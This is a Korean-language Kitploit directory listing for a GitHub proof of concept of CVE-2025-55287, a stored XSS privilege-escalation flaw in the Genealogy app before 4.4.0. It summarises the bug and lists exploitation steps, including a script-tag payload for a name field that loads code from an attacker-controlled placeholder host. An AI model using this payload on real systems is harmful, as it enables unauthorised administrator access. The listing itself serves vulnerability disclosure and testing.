Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-55287-POC — 인증된 저장형 XSS 권한 상승 PoC. Genealogy 4.4.0 이전 버전에 영향 | Kitploit
도구/GitHubGitHub/eternalvalhalla/cve-2025-55287-poc
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubeternalvalhalla/cve-2025-55287-poc

CVE-2025-55287-POC

인증된 저장형 XSS 권한 상승 PoC. Genealogy 4.4.0 이전 버전에 영향

저장소 보기
10년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-55287-POC

Genealogy 앱 4.4.0 이전 버전에서 인증된 저장형 크로스 사이트 스크립팅(XSS) 취약점으로, 임의의 JavaScript 실행 및 Editor+ 역할에서 Administrator로의 권한 상승이 가능합니다.

요약
  • 취약점 유형: 저장형 크로스 사이트 스크립팅 (CWE-79)
  • 영향을 받는 구성 요소: 'Person'의 이름과 성
  • 영향을 받는 버전: 4.4.0 이전 모든 버전
  • 영향: 피해자 브라우저에서 공격자가 제공한 JavaScript의 지속적 실행; 세션 하이재킹, DOM을 통한 CSRF, UI 리드레스, 자격 증명 도용 또는 피해자로서의 임의 작업 수행
  • 공격 벡터: 인증됨 (새로운 인물 생성이 가능한 모든 역할 - Editor+)
악용 방법

근본 원인: 더 높은 권한의 사용자가 영향을 받는 인물을 성공적으로 삭제할 때, 해당 인물의 이름/성에 대한 서버 측 살균/인코딩이 불충분하기 때문

PoC:

  1. 애플리케이션에 인증합니다 (editor+ 역할).
  2. 새로운 인물을 생성합니다 (반드시 어떤 가족에 할당할 필요는 없음).
  3. 추가된 인물의 이름 또는 성에 JavaScript를 포함시킵니다: <script src='yourserver/poc.js'></script>
  4. poc.js 파일을 편집하여 플레이스홀더에 자신의 이메일 주소를 입력합니다.
  5. 권한 있는 사용자가 새로 추가된 인물을 삭제하려고 시도하면, 제공된 이메일 주소로 Administrator 역할로 플랫폼에 초대를 받게 됩니다.
도구 다운로드